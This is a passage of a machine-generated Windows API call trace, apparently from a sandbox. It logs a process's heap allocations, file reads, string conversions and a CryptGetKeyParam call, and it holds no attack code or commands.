dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0081.100] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0081.101] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0xa39c, lpOverlapped=0x0) returned 1 [0081.102] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0081.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0081.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa39c) returned 0x499a008 [0081.105] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0081.105] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0081.105] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0081.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0081.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0081.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0081.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0081.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0081.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0081.105] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.105] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0081.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0081.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0081.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0081.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0081.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796f48 [0081.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0081.106] CryptGetKeyParam (in: hKey=0x41ac180, dwParam=0x7, pbData=0x43e2990, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2990*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0081.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0081.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0081.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0081.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0081.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0081.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0081.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0081.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0081.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0081.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0081.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0081.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0081.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0081.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0081.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0081.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0081.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0081.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0081.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0081.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0081.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0081.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0081.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0081.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0081.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.108] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0081.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0081.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0081.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0081.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0081.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0081.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0081.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0081.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0081.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0081.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0081.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0081.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0081.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0081.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0081.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0081.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0081.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0081.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0081.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0081.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0081.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0081.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0081.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0081.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0081.109] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cc0 [0081.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0081.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0081.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0081.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0081.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0081.109] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0081.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0081.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0081.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0081.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0081.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0081.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0081.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0081.409] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0081.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0081.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0081.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0081.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0081.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0081.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0081.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0081.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0081.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0081.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.411] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0081.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0081.411] RtlAllocateHeap (HeapHandle=0x1780000, 